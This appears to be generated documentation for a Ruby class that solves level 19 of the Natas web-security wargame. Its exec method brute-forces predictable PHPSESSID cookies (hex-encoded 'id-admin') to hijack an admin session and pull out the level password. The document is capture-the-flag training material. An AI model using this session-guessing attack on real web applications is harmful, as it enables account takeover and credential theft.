Class: NatasLevel19

Inherits:
NatasLevelBase show all
Defined in:
lib/natas.rb

Overview

Level 19

Constant Summary collapse

LEVEL = 
19
PAGE = 
'/'
MAX_ID = 
999
USERNAME = 
'admin'

Constants inherited from NatasLevelBase

NatasLevelBase::HOST, NatasLevelBase::LOGIN, NatasLevelBase::PASSWORD_LENGTH, NatasLevelBase::PORT, NatasLevelBase::WEBPASS

Instance Attribute Summary

Attributes inherited from NatasLevelBase

#login, #password

Instance Method Summary collapse

Methods inherited from NatasLevelBase

#get, #initialize, #level, #post

Constructor Details

This class inherits a constructor from NatasLevelBase

Instance Method Details

#execObject 



592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
 
# File 'lib/natas.rb', line 592

def exec
  log('Bruteforcing PHPSESSID')
  MAX_ID.times do |id|
    session_id = "#{id}-#{USERNAME}".unpack1('H*')
    data = post(
      PAGE,
      {
        'Cookie' => "PHPSESSID=#{session_id}"
      },
      {
        'username' => USERNAME,
        'password' => ''
      }
    ).body
    match = %r(Password: (\w{32})</pre>).match(data)
    next unless match

    log("Found session: #{session_id}")
    return found(match[1])
  end

  not_found
end